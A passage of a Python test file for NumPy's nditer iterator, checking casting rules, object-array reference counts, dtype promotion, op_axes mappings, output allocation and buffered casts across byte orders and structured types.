    # Need to enable copying for casts to occur
    assert_raises(TypeError, nditer, arange(2, dtype='f4'), [],
                  [['readonly']], op_dtypes=[np.dtype('f8')])
    # Also need to allow casting for casts to occur
    assert_raises(TypeError, nditer, arange(2, dtype='f4'), [],
                  [['readonly', 'copy']], casting='no',
                  op_dtypes=[np.dtype('f8')])
    assert_raises(TypeError, nditer, arange(2, dtype='f4'), [],
                  [['readonly', 'copy']], casting='equiv',
                  op_dtypes=[np.dtype('f8')])
    assert_raises(TypeError, nditer, arange(2, dtype='f8'), [],
                  [['writeonly', 'updateifcopy']], casting='no',
                  op_dtypes=[np.dtype('f4')])
    assert_raises(TypeError, nditer, arange(2, dtype='f8'), [],
                  [['writeonly', 'updateifcopy']], casting='equiv',
                  op_dtypes=[np.dtype('f4')])
    # '<f4' -> '>f4' should not work with casting='no'
    assert_raises(TypeError, nditer, arange(2, dtype='<f4'), [],
                  [['readonly', 'copy']], casting='no',
                  op_dtypes=[np.dtype('>f4')])
    # 'f4' -> 'f8' is a safe cast, but 'f8' -> 'f4' isn't
    assert_raises(TypeError, nditer, arange(2, dtype='f4'), [],
                  [['readwrite', 'updateifcopy']], casting='safe',
                  op_dtypes=[np.dtype('f8')])
    assert_raises(TypeError, nditer, arange(2, dtype='f8'), [],
                  [['readwrite', 'updateifcopy']], casting='safe',
                  op_dtypes=[np.dtype('f4')])
    # 'f4' -> 'i4' is neither a safe nor a same-kind cast
    assert_raises(TypeError, nditer, arange(2, dtype='f4'), [],
                  [['readonly', 'copy']], casting='same_kind',
                  op_dtypes=[np.dtype('i4')])
    assert_raises(TypeError, nditer, arange(2, dtype='i4'), [],
                  [['writeonly', 'updateifcopy']], casting='same_kind',
                  op_dtypes=[np.dtype('f4')])

def test_iter_scalar_cast():
    """Casting of scalar operands via op_dtypes."""
    # Check that scalars are cast as requested
    # No cast 'f4' -> 'f4'
    i = nditer(np.float32(2.5), [], [['readonly']],
               op_dtypes=[np.dtype('f4')])
    assert_equal(i.dtypes[0], np.dtype('f4'))
    assert_equal(i.value.dtype, np.dtype('f4'))
    assert_equal(i.value, 2.5)
    # Safe cast 'f4' -> 'f8'
    i = nditer(np.float32(2.5), [], [['readonly', 'copy']],
               casting='safe', op_dtypes=[np.dtype('f8')])
    assert_equal(i.dtypes[0], np.dtype('f8'))
    assert_equal(i.value.dtype, np.dtype('f8'))
    assert_equal(i.value, 2.5)
    # Same-kind cast 'f8' -> 'f4'
    i = nditer(np.float64(2.5), [], [['readonly', 'copy']],
               casting='same_kind', op_dtypes=[np.dtype('f4')])
    assert_equal(i.dtypes[0], np.dtype('f4'))
    assert_equal(i.value.dtype, np.dtype('f4'))
    assert_equal(i.value, 2.5)
    # Unsafe cast 'f8' -> 'i4'
    i = nditer(np.float64(3.0), [], [['readonly', 'copy']],
               casting='unsafe', op_dtypes=[np.dtype('i4')])
    assert_equal(i.dtypes[0], np.dtype('i4'))
    assert_equal(i.value.dtype, np.dtype('i4'))
    assert_equal(i.value, 3)
    # Readonly scalars may be cast even without setting COPY or BUFFERED
    i = nditer(3, [], [['readonly']], op_dtypes=[np.dtype('f8')])
    assert_equal(i[0].dtype, np.dtype('f8'))
    assert_equal(i[0], 3.)
def test_iter_scalar_cast_errors():
    """Invalid scalar casts must raise TypeError."""
    # Check that invalid casts are caught
    # Need to allow copying/buffering for write casts of scalars to occur
    assert_raises(TypeError, nditer, np.float32(2), [],
                  [['readwrite']], op_dtypes=[np.dtype('f8')])
    assert_raises(TypeError, nditer, 2.5, [],
                  [['readwrite']], op_dtypes=[np.dtype('f4')])
    # 'f8' -> 'f4' isn't a safe cast if the value would overflow
    assert_raises(TypeError, nditer, np.float64(1e60), [],
                  [['readonly']], casting='safe', op_dtypes=[np.dtype('f4')])
    # 'f4' -> 'i4' is neither a safe nor a same-kind cast
    assert_raises(TypeError, nditer, np.float32(2), [],
                  [['readonly']], casting='same_kind',
                  op_dtypes=[np.dtype('i4')])

def test_iter_object_arrays_basic():
    """Object arrays require 'refs_ok'; refcounts must stay balanced."""
    # Check that object arrays work
    obj = {'a':3,'b':'d'}
    a = np.array([[1, 2, 3], None, obj, None], dtype='O')
    rc = sys.getrefcount(obj)

    # Need to allow references for object arrays
    assert_raises(TypeError, nditer, a)
    assert_equal(sys.getrefcount(obj), rc)

    i = nditer(a, ['refs_ok'], ['readonly'])
    vals = [x_[()] for x_ in i]
    assert_equal(np.array(vals, dtype='O'), a)
    vals, i, x = [None]*3
    assert_equal(sys.getrefcount(obj), rc)

    i = nditer(a.reshape(2, 2).T, ['refs_ok', 'buffered'],
               ['readonly'], order='C')
    assert_(i.iterationneedsapi)
    vals = [x_[()] for x_ in i]
    assert_equal(np.array(vals, dtype='O'), a.reshape(2, 2).ravel(order='F'))
    vals, i, x = [None]*3
    assert_equal(sys.getrefcount(obj), rc)

    i = nditer(a.reshape(2, 2).T, ['refs_ok', 'buffered'],
               ['readwrite'], order='C')
    for x in i:
        x[...] = None
    vals, i, x = [None]*3
    # Overwriting the array dropped one reference to obj.
    assert_equal(sys.getrefcount(obj), rc-1)
    assert_equal(a, np.array([None]*4, dtype='O'))

def test_iter_object_arrays_conversions():
    """Buffered conversions between object and numeric dtypes."""
    # Conversions to/from objects
    a = np.arange(6, dtype='O')
    i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'],
               casting='unsafe', op_dtypes='i4')
    for x in i:
        x[...] += 1
    assert_equal(a, np.arange(6)+1)

    a = np.arange(6, dtype='i4')
    i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'],
               casting='unsafe', op_dtypes='O')
    for x in i:
        x[...] += 1
    assert_equal(a, np.arange(6)+1)

    # Non-contiguous object array
    a = np.zeros((6,), dtype=[('p', 'i1'), ('a', 'O')])
    a = a['a']
    a[:] = np.arange(6)
    i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'],
               casting='unsafe', op_dtypes='i4')
    for x in i:
        x[...] += 1
    assert_equal(a, np.arange(6)+1)

    #Non-contiguous value array
    a = np.zeros((6,), dtype=[('p', 'i1'), ('a', 'i4')])
    a = a['a']
    a[:] = np.arange(6) + 98172488
    i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'],
               casting='unsafe', op_dtypes='O')
    ob = i[0][()]
    rc = sys.getrefcount(ob)
    for x in i:
        x[...] += 1
    assert_equal(sys.getrefcount(ob), rc-1)
    assert_equal(a, np.arange(6)+98172489)

def test_iter_common_dtype():
    """The 'common_dtype' flag promotes all operands to one dtype."""
    # Check that the iterator finds a common data type correctly
    i = nditer([array([3], dtype='f4'), array([0], dtype='f8')],
               ['common_dtype'], [['readonly', 'copy']]*2, casting='safe')
    assert_equal(i.dtypes[0], np.dtype('f8'))
    assert_equal(i.dtypes[1], np.dtype('f8'))
    i = nditer([array([3], dtype='i4'), array([0], dtype='f4')],
               ['common_dtype'], [['readonly', 'copy']]*2, casting='safe')
    assert_equal(i.dtypes[0], np.dtype('f8'))
    assert_equal(i.dtypes[1], np.dtype('f8'))
    i = nditer([array([3], dtype='f4'), array(0, dtype='f8')],
               ['common_dtype'], [['readonly', 'copy']]*2,
               casting='same_kind')
    assert_equal(i.dtypes[0], np.dtype('f4'))
    assert_equal(i.dtypes[1], np.dtype('f4'))
    i = nditer([array([3], dtype='u4'), array(0, dtype='i4')],
               ['common_dtype'], [['readonly', 'copy']]*2, casting='safe')
    assert_equal(i.dtypes[0], np.dtype('u4'))
    assert_equal(i.dtypes[1], np.dtype('u4'))
    i = nditer([array([3], dtype='u4'), array(-12, dtype='i4')],
               ['common_dtype'], [['readonly', 'copy']]*2, casting='safe')
    assert_equal(i.dtypes[0], np.dtype('i8'))
    assert_equal(i.dtypes[1], np.dtype('i8'))
    i = nditer([array([3], dtype='u4'), array(-12, dtype='i4'),
                array([2j], dtype='c8'), array([9], dtype='f8')],
               ['common_dtype'], [['readonly', 'copy']]*4, casting='safe')
    assert_equal(i.dtypes[0], np.dtype('c16'))
    assert_equal(i.dtypes[1], np.dtype('c16'))
    assert_equal(i.dtypes[2], np.dtype('c16'))
    assert_equal(i.dtypes[3], np.dtype('c16'))
    assert_equal(i.value, (3, -12, 2j, 9))
    # When allocating outputs, other outputs aren't factored in
    i = nditer([array([3], dtype='i4'), None, array([2j], dtype='c16')], [],
               [['readonly', 'copy'],
                ['writeonly', 'allocate'],
                ['writeonly']],
               casting='safe')
    assert_equal(i.dtypes[0], np.dtype('i4'))
    assert_equal(i.dtypes[1], np.dtype('i4'))
    assert_equal(i.dtypes[2], np.dtype('c16'))
    # But, if common data types are requested, they are
    i = nditer([array([3], dtype='i4'), None, array([2j], dtype='c16')],
               ['common_dtype'],
               [['readonly', 'copy'],
                ['writeonly', 'allocate'],
                ['writeonly']],
               casting='safe')
    assert_equal(i.dtypes[0], np.dtype('c16'))
    assert_equal(i.dtypes[1], np.dtype('c16'))
    assert_equal(i.dtypes[2], np.dtype('c16'))

def test_iter_op_axes():
    """Custom op_axes mappings: reversal, broadcasting, products."""
    # Check that custom axes work
    # Reverse the axes
    a = arange(6).reshape(2, 3)
    i = nditer([a, a.T], [], [['readonly']]*2, op_axes=[[0, 1], [1, 0]])
    assert_(all([x == y for (x, y) in i]))
    a = arange(24).reshape(2, 3, 4)
    i = nditer([a.T, a], [], [['readonly']]*2, op_axes=[[2, 1, 0], None])
    assert_(all([x == y for (x, y) in i]))
    # Broadcast 1D to any dimension
    a = arange(1, 31).reshape(2, 3, 5)
    b = arange(1, 3)
    i = nditer([a, b], [], [['readonly']]*2, op_axes=[None, [0, -1, -1]])
    assert_equal([x*y for (x, y) in i], (a*b.reshape(2, 1, 1)).ravel())
    b = arange(1, 4)
    i = nditer([a, b], [], [['readonly']]*2, op_axes=[None, [-1, 0, -1]])
    assert_equal([x*y for (x, y) in i], (a*b.reshape(1, 3, 1)).ravel())
    b = arange(1, 6)
    i = nditer([a, b], [], [['readonly']]*2,
               op_axes=[None, [np.newaxis, np.newaxis, 0]])
    assert_equal([x*y for (x, y) in i], (a*b.reshape(1, 1, 5)).ravel())
    # Inner product-style broadcasting
    a = arange(24).reshape(2, 3, 4)
    b = arange(40).reshape(5, 2, 4)
    i = nditer([a, b], ['multi_index'], [['readonly']]*2,
               op_axes=[[0, 1, -1, -1], [-1, -1, 0, 1]])
    assert_equal(i.shape, (2, 3, 5, 2))
    # Matrix product-style broadcasting
    a = arange(12).reshape(3, 4)
    b = arange(20).reshape(4, 5)
    i = nditer([a, b], ['multi_index'], [['readonly']]*2,
               op_axes=[[0, -1], [-1, 1]])
    assert_equal(i.shape, (3, 5))

def test_iter_op_axes_errors():
    """Bad op_axes inputs must raise ValueError."""
    # Check that custom axes throws errors for bad inputs
    # Wrong number of items in op_axes
    a = arange(6).reshape(2, 3)
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0], [1], [0]])
    # Out of bounds items in op_axes
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[2, 1], [0, 1]])
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0, 1], [2, -1]])
    # Duplicate items in op_axes
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0, 0], [0, 1]])
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0, 1], [1, 1]])
    # Different sized arrays in op_axes
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0, 1], [0, 1, 0]])
    # Non-broadcastable dimensions in the result
    assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2,
                  op_axes=[[0, 1], [1, 0]])

def test_iter_copy():
    """nditer.copy() must preserve position, range, and casting state."""
    # Check that copying the iterator works correctly
    a = arange(24).reshape(2, 3, 4)

    # Simple iterator
    i = nditer(a)
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    i.iterindex = 3
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    # Buffered iterator
    i = nditer(a, ['buffered', 'ranged'], order='F', buffersize=3)
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    i.iterindex = 3
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    i.iterrange = (3, 9)
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    i.iterrange = (2, 18)
    next(i)
    next(i)
    j = i.copy()
    assert_equal([x[()] for x in i], [x[()] for x in j])

    # Casting iterator
    i = nditer(a, ['buffered'], order='F', casting='unsafe',
               op_dtypes='f8', buffersize=5)
    j = i.copy()
    i = None
    assert_equal([x[()] for x in j], a.ravel(order='F'))

    a = arange(24, dtype='<i4').reshape(2, 3, 4)
    i = nditer(a, ['buffered'], order='F', casting='unsafe',
               op_dtypes='>f8', buffersize=5)
    j = i.copy()
    i = None
    assert_equal([x[()] for x in j], a.ravel(order='F'))

def test_iter_allocate_output_simple():
    """Basic automatic output allocation from a single input."""
    # Check that the iterator will properly allocate outputs
    # Simple case
    a = arange(6)
    i = nditer([a, None], [],
               [['readonly'], ['writeonly', 'allocate']],
               op_dtypes=[None, np.dtype('f4')])
    assert_equal(i.operands[1].shape, a.shape)
    assert_equal(i.operands[1].dtype, np.dtype('f4'))

def test_iter_allocate_output_buffered_readwrite():
    """Allocated output combined with buffering + delay_bufalloc."""
    # Allocated output with buffering + delay_bufalloc
    a = arange(6)
    i = nditer([a, None], ['buffered', 'delay_bufalloc'],
               [['readonly'], ['allocate', 'readwrite']])
    i.operands[1][:] = 1
    i.reset()
    for x in i:
        x[1][...] += x[0][...]
    assert_equal(i.operands[1], a+1)

def test_iter_allocate_output_itorder():
    """Allocated outputs take the iteration order (continues below)."""
    # The allocated output should match the iteration order
    # C-order input, best iteration order
    a = arange(6, dtype='i4').reshape(2, 3)
    i = nditer([a, None], [],
               [['readonly'], ['writeonly', 'allocate']],
               op_dtypes=[None, np.dtype('f4')])
    assert_equal(i.operands[1].shape, a.shape)
    assert_equal(i.operands[1].strides, a.strides)
    assert_equal(i.operands[1].dtype, np.dtype('f4'))
    # F-order input, best iteration order
    a = arange(24, dtype='i4').reshape(2, 3, 4).T
    i = nditer([a, None], [],
               [['readonly'], ['writeonly', 'allocate']],
               op_dtypes=[None, np.dtype('f4')])
    assert_equal(i.operands[1].shape, a.shape)
    assert_equal(i.operands[1].strides, a.strides)
    assert_equal(i.operands[1].dtype, np.dtype('f4'))
    # Non-contiguous input, C iteration order
    a = arange(24, dtype='i4').reshape(2, 3, 4).swapaxes(0, 1)
    i = nditer([a, None], [],
               [['readonly'], ['writeonly', 'allocate']],
               order='C',
               op_dtypes=[None, np.dtype('f4')])
    # (continuation of test_iter_allocate_output_itorder from above)
    assert_equal(i.operands[1].shape, a.shape)
    assert_equal(i.operands[1].strides, (32, 16, 4))
    assert_equal(i.operands[1].dtype, np.dtype('f4'))

def test_iter_allocate_output_opaxes():
    """op_axes on an allocated output permutes its layout."""
    # Specifing op_axes should work
    a = arange(24, dtype='i4').reshape(2, 3, 4)
    i = nditer([None, a], [],
               [['writeonly', 'allocate'], ['readonly']],
               op_dtypes=[np.dtype('u4'), None],
               op_axes=[[1, 2, 0], None])
    assert_equal(i.operands[0].shape, (4, 2, 3))
    assert_equal(i.operands[0].strides, (4, 48, 16))
    assert_equal(i.operands[0].dtype, np.dtype('u4'))

def test_iter_allocate_output_types_promotion():
    """Automatic outputs follow value-based type promotion."""
    # Check type promotion of automatic outputs
    i = nditer([array([3], dtype='f4'), array([0], dtype='f8'), None], [],
               [['readonly']]*2+[['writeonly', 'allocate']])
    assert_equal(i.dtypes[2], np.dtype('f8'))
    i = nditer([array([3], dtype='i4'), array([0], dtype='f4'), None], [],
               [['readonly']]*2+[['writeonly', 'allocate']])
    assert_equal(i.dtypes[2], np.dtype('f8'))
    i = nditer([array([3], dtype='f4'), array(0, dtype='f8'), None], [],
               [['readonly']]*2+[['writeonly', 'allocate']])
    assert_equal(i.dtypes[2], np.dtype('f4'))
    i = nditer([array([3], dtype='u4'), array(0, dtype='i4'), None], [],
               [['readonly']]*2+[['writeonly', 'allocate']])
    assert_equal(i.dtypes[2], np.dtype('u4'))
    i = nditer([array([3], dtype='u4'), array(-12, dtype='i4'), None], [],
               [['readonly']]*2+[['writeonly', 'allocate']])
    assert_equal(i.dtypes[2], np.dtype('i8'))

def test_iter_allocate_output_types_byte_order():
    """Byte-order rules for automatically allocated outputs."""
    # Verify the rules for byte order changes
    # When there's just one input, the output type exactly matches
    a = array([3], dtype='u4').newbyteorder()
    i = nditer([a, None], [],
               [['readonly'], ['writeonly', 'allocate']])
    assert_equal(i.dtypes[0], i.dtypes[1])
    # With two or more inputs, the output type is in native byte order
    i = nditer([a, a, None], [],
               [['readonly'], ['readonly'], ['writeonly', 'allocate']])
    assert_(i.dtypes[0] != i.dtypes[2])
    assert_equal(i.dtypes[0].newbyteorder('='), i.dtypes[2])

def test_iter_allocate_output_types_scalar():
    """All-scalar inputs allocate a zero-dimensional output."""
    # If the inputs are all scalars, the output should be a scalar
    i = nditer([None, 1, 2.3, np.float32(12), np.complex128(3)], [],
               [['writeonly', 'allocate']] + [['readonly']]*4)
    assert_equal(i.operands[0].dtype, np.dtype('complex128'))
    assert_equal(i.operands[0].ndim, 0)

def test_iter_allocate_output_subtype():
    """Subtype with highest priority wins for allocated outputs."""
    # Make sure that the subtype with priority wins
    # matrix vs ndarray
    a = np.matrix([[1, 2], [3, 4]])
    b = np.arange(4).reshape(2, 2).T
    i = nditer([a, b, None], [],
               [['readonly'], ['readonly'], ['writeonly', 'allocate']])
    assert_equal(type(a), type(i.operands[2]))
    assert_(type(b) != type(i.operands[2]))
    assert_equal(i.operands[2].shape, (2, 2))

    # matrix always wants things to be 2D
    b = np.arange(4).reshape(1, 2, 2)
    assert_raises(RuntimeError, nditer, [a, b, None], [],
                  [['readonly'], ['readonly'], ['writeonly', 'allocate']])
    # but if subtypes are disabled, the result can still work
    i = nditer([a, b, None], [],
               [['readonly'], ['readonly'],
                ['writeonly', 'allocate', 'no_subtype']])
    assert_equal(type(b), type(i.operands[2]))
    assert_(type(a) != type(i.operands[2]))
    assert_equal(i.operands[2].shape, (1, 2, 2))

def test_iter_allocate_output_errors():
    """Bad output-allocation requests must raise."""
    # Check that the iterator will throw errors for bad output allocations
    # Need an input if no output data type is specified
    a = arange(6)
    assert_raises(TypeError, nditer, [a, None], [],
                  [['writeonly'], ['writeonly', 'allocate']])
    # Allocated output should be flagged for writing
    assert_raises(ValueError, nditer, [a, None], [],
                  [['readonly'], ['allocate', 'readonly']])
    # Allocated output can't have buffering without delayed bufalloc
    assert_raises(ValueError, nditer, [a, None], ['buffered'],
                  ['allocate', 'readwrite'])
    # Must specify at least one input
    assert_raises(ValueError, nditer, [None, None], [],
                  [['writeonly', 'allocate'], ['writeonly', 'allocate']],
                  op_dtypes=[np.dtype('f4'), np.dtype('f4')])
    # If using op_axes, must specify all the axes
    a = arange(24, dtype='i4').reshape(2, 3, 4)
    assert_raises(ValueError, nditer, [a, None], [],
                  [['readonly'], ['writeonly', 'allocate']],
                  op_dtypes=[None, np.dtype('f4')],
                  op_axes=[None, [0, np.newaxis, 1]])
    # If using op_axes, the axes must be within bounds
    assert_raises(ValueError, nditer, [a, None], [],
                  [['readonly'], ['writeonly', 'allocate']],
                  op_dtypes=[None, np.dtype('f4')],
                  op_axes=[None, [0, 3, 1]])
    # If using op_axes, there can't be duplicates
    assert_raises(ValueError, nditer, [a, None], [],
                  [['readonly'], ['writeonly', 'allocate']],
                  op_dtypes=[None, np.dtype('f4')],
                  op_axes=[None, [0, 2, 1, 0]])

def test_iter_remove_axis():
    """remove_axis() pins iteration to index 0 of the removed axis."""
    a = arange(24).reshape(2, 3, 4)

    i = nditer(a, ['multi_index'])
    i.remove_axis(1)
    assert_equal([x for x in i], a[:, 0,:].ravel())

    a = a[::-1,:,:]
    i = nditer(a, ['multi_index'])
    i.remove_axis(0)
    assert_equal([x for x in i], a[0,:,:].ravel())

def test_iter_remove_multi_index_inner_loop():
    """remove_multi_index()/enable_external_loop() coalesce dimensions."""
    # Check that removing multi-index support works
    a = arange(24).reshape(2, 3, 4)

    i = nditer(a, ['multi_index'])
    assert_equal(i.ndim, 3)
    assert_equal(i.shape, (2, 3, 4))
    assert_equal(i.itviews[0].shape, (2, 3, 4))

    # Removing the multi-index tracking causes all dimensions to coalesce
    before = [x for x in i]
    i.remove_multi_index()
    after = [x for x in i]

    assert_equal(before, after)
    assert_equal(i.ndim, 1)
    assert_raises(ValueError, lambda i:i.shape, i)
    assert_equal(i.itviews[0].shape, (24,))

    # Removing the inner loop means there's just one iteration
    i.reset()
    assert_equal(i.itersize, 24)
    assert_equal(i[0].shape, tuple())
    i.enable_external_loop()
    assert_equal(i.itersize, 24)
    assert_equal(i[0].shape, (24,))
    assert_equal(i.value, arange(24))

def test_iter_iterindex():
    """Setting iterindex skips to a position (continues below)."""
    # Make sure iterindex works
    buffersize = 5
    a = arange(24).reshape(4, 3, 2)
    for flags in ([], ['buffered']):
        i = nditer(a, flags, buffersize=buffersize)
        assert_equal(iter_iterindices(i), list(range(24)))
        i.iterindex = 2
        assert_equal(iter_iterindices(i), list(range(2, 24)))

        i = nditer(a, flags, order='F', buffersize=buffersize)
        # (continuation of test_iter_iterindex's flags loop from above)
        assert_equal(iter_iterindices(i), list(range(24)))
        i.iterindex = 5
        assert_equal(iter_iterindices(i), list(range(5, 24)))

        i = nditer(a[::-1], flags, order='F', buffersize=buffersize)
        assert_equal(iter_iterindices(i), list(range(24)))
        i.iterindex = 9
        assert_equal(iter_iterindices(i), list(range(9, 24)))

        i = nditer(a[::-1, ::-1], flags, order='C', buffersize=buffersize)
        assert_equal(iter_iterindices(i), list(range(24)))
        i.iterindex = 13
        assert_equal(iter_iterindices(i), list(range(13, 24)))

        i = nditer(a[::1, ::-1], flags, buffersize=buffersize)
        assert_equal(iter_iterindices(i), list(range(24)))
        i.iterindex = 23
        assert_equal(iter_iterindices(i), list(range(23, 24)))
        i.reset()
        i.iterindex = 2
        assert_equal(iter_iterindices(i), list(range(2, 24)))

def test_iter_iterrange():
    """Getting and resetting iterrange restricts iteration to a range."""
    # Make sure getting and resetting the iterrange works
    buffersize = 5
    a = arange(24, dtype='i4').reshape(4, 3, 2)
    a_fort = a.ravel(order='F')

    i = nditer(a, ['ranged'], ['readonly'], order='F',
               buffersize=buffersize)
    assert_equal(i.iterrange, (0, 24))
    assert_equal([x[()] for x in i], a_fort)
    for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]:
        i.iterrange = r
        assert_equal(i.iterrange, r)
        assert_equal([x[()] for x in i], a_fort[r[0]:r[1]])

    i = nditer(a, ['ranged', 'buffered'], ['readonly'], order='F',
               op_dtypes='f8', buffersize=buffersize)
    assert_equal(i.iterrange, (0, 24))
    assert_equal([x[()] for x in i], a_fort)
    for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]:
        i.iterrange = r
        assert_equal(i.iterrange, r)
        assert_equal([x[()] for x in i], a_fort[r[0]:r[1]])

    # Helper: flatten an external_loop iterator's chunks into one array.
    def get_array(i):
        val = np.array([], dtype='f8')
        for x in i:
            val = np.concatenate((val, x))
        return val

    i = nditer(a, ['ranged', 'buffered', 'external_loop'], ['readonly'],
               order='F', op_dtypes='f8', buffersize=buffersize)
    assert_equal(i.iterrange, (0, 24))
    assert_equal(get_array(i), a_fort)
    for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]:
        i.iterrange = r
        assert_equal(i.iterrange, r)
        assert_equal(get_array(i), a_fort[r[0]:r[1]])

def test_iter_buffering():
    """Buffered reads across several buffer sizes and memory layouts."""
    # Test buffering with several buffer sizes and types
    arrays = []
    # F-order swapped array
    arrays.append(np.arange(24,
        dtype='c16').reshape(2, 3, 4).T.newbyteorder().byteswap())
    # Contiguous 1-dimensional array
    arrays.append(np.arange(10, dtype='f4'))
    # Unaligned array
    a = np.zeros((4*16+1,), dtype='i1')[1:]
    a.dtype = 'i4'
    a[:] = np.arange(16, dtype='i4')
    arrays.append(a)
    # 4-D F-order array
    arrays.append(np.arange(120, dtype='i4').reshape(5, 3, 2, 4).T)
    for a in arrays:
        for buffersize in (1, 2, 3, 5, 8, 11, 16, 1024):
            vals = []
            i = nditer(a, ['buffered', 'external_loop'],
                       [['readonly', 'nbo', 'aligned']],
                       order='C',
                       casting='equiv',
                       buffersize=buffersize)
            while not i.finished:
                assert_(i[0].size <= buffersize)
                vals.append(i[0].copy())
                i.iternext()
            assert_equal(np.concatenate(vals), a.ravel(order='C'))

def test_iter_write_buffering():
    """Writes through a buffered iterator reach the underlying array."""
    # Test that buffering of writes is working
    # F-order swapped array
    a = np.arange(24).reshape(2, 3, 4).T.newbyteorder().byteswap()
    i = nditer(a, ['buffered'],
               [['readwrite', 'nbo', 'aligned']],
               casting='equiv',
               order='C',
               buffersize=16)
    x = 0
    while not i.finished:
        i[0] = x
        x += 1
        i.iternext()
    assert_equal(a.ravel(order='C'), np.arange(24))

def test_iter_buffering_delayed_alloc():
    """delay_bufalloc defers buffer allocation until reset()."""
    # Test that delaying buffer allocation works
    a = np.arange(6)
    b = np.arange(1, dtype='f4')
    i = nditer([a, b],
               ['buffered', 'delay_bufalloc', 'multi_index', 'reduce_ok'],
               ['readwrite'],
               casting='unsafe',
               op_dtypes='f4')
    assert_(i.has_delayed_bufalloc)
    assert_raises(ValueError, lambda i:i.multi_index, i)
    assert_raises(ValueError, lambda i:i[0], i)
    assert_raises(ValueError, lambda i:i[0:2], i)

    def assign_iter(i):
        i[0] = 0
    assert_raises(ValueError, assign_iter, i)

    i.reset()
    assert_(not i.has_delayed_bufalloc)
    assert_equal(i.multi_index, (0,))
    assert_equal(i[0], 0)
    i[1] = 1
    assert_equal(i[0:2], [0, 1])
    assert_equal([[x[0][()], x[1][()]] for x in i],
                 list(zip(range(6), [1]*6)))

def test_iter_buffered_cast_simple():
    """Buffered iteration with a simple dtype cast."""
    # Test that buffering can handle a simple cast
    a = np.arange(10, dtype='f4')
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('f8')],
               buffersize=3)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype='f4'))

def test_iter_buffered_cast_byteswapped():
    """Buffered cast requiring swap->cast->swap."""
    # Test that buffering can handle a cast which requires swap->cast->swap
    a = np.arange(10, dtype='f4').newbyteorder().byteswap()
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('f8').newbyteorder()],
               buffersize=3)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype='f4'))

    try:
        # Complex -> float discards the imaginary part; silence the warning.
        warnings.simplefilter("ignore", np.ComplexWarning)

        a = np.arange(10, dtype='f8').newbyteorder().byteswap()
        i = nditer(a, ['buffered', 'external_loop'],
                   [['readwrite', 'nbo', 'aligned']],
                   casting='unsafe',
                   op_dtypes=[np.dtype('c8').newbyteorder()],
                   buffersize=3)
        for v in i:
            v[...] *= 2
        assert_equal(a, 2*np.arange(10, dtype='f8'))
    finally:
        warnings.simplefilter("default", np.ComplexWarning)

def test_iter_buffered_cast_byteswapped_complex():
    """Buffered cast requiring swap->cast->copy for complex dtypes."""
    # Test that buffering can handle a cast which requires swap->cast->copy
    a = np.arange(10, dtype='c8').newbyteorder().byteswap()
    a += 2j
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('c16')],
               buffersize=3)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype='c8') + 4j)

    a = np.arange(10, dtype='c8')
    a += 2j
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('c16').newbyteorder()],
               buffersize=3)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype='c8') + 4j)

    a = np.arange(10, dtype=np.clongdouble).newbyteorder().byteswap()
    a += 2j
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('c16')],
               buffersize=3)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype=np.clongdouble) + 4j)

    a = np.arange(10, dtype=np.longdouble).newbyteorder().byteswap()
    i = nditer(a, ['buffered', 'external_loop'],
               [['readwrite', 'nbo', 'aligned']],
               casting='same_kind',
               op_dtypes=[np.dtype('f4')],
               buffersize=7)
    for v in i:
        v[...] *= 2
    assert_equal(a, 2*np.arange(10, dtype=np.longdouble))

def test_iter_buffered_cast_structured_type():
    """Buffered casts to/from structured dtypes (continues below)."""
    # Tests buffering of structured types

    # simple -> struct type (duplicates the value)
    sdt = [('a', 'f4'), ('b', 'i8'), ('c', 'c8', (2, 3)), ('d', 'O')]
    a = np.arange(3, dtype='f4') + 0.5
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt)
    vals = [np.array(x) for x in i]
    assert_equal(vals[0]['a'], 0.5)
    assert_equal(vals[0]['b'], 0)
    assert_equal(vals[0]['c'], [[(0.5)]*3]*2)
    assert_equal(vals[0]['d'], 0.5)
    assert_equal(vals[1]['a'], 1.5)
    assert_equal(vals[1]['b'], 1)
    assert_equal(vals[1]['c'], [[(1.5)]*3]*2)
    assert_equal(vals[1]['d'], 1.5)
    assert_equal(vals[0].dtype, np.dtype(sdt))

    # object -> struct type
